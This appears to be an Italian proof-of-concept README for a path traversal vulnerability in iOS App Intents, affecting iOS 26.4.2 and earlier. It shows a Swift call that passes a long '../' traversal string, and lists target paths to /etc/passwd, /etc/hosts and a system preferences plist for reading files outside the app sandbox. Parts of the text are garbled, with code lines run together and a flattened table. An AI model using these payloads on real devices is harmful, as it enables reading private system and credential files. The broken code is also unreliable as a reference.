
# CVE-2026-28995 Prova di concetto per CVE-2026-28995 — Vulnerabilità di Path Traversal in App Intents su iOS 26.4.2 e versioni precedenti.
Proof of Concept per CVE-2026-28995 — Vulnerabilità di Path Traversal in App Intents su iOS 26.4.2 e versioni precedenti.
Questa vulnerabilità permette a un'app dannosa di leggere qualsiasi file al di fuori della sua sandbox tramite App Intents. La causa principale è una validazione insufficiente dei percorsi nel framework App Intents di Apple.
Versioni affette: iOS 26.4.2 e inferiori
Corretto in: iOS 26.5 (11 maggio 2026)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
Path Legge ../../../../../../../../../../../../../etc/passwd Password utente ../../../../../../../../../../../../../etc/hosts File hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Preferenze di sistema
Se il percorso punta a una directory, la funzione restituisce:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
readCve(path:) con il percorso target.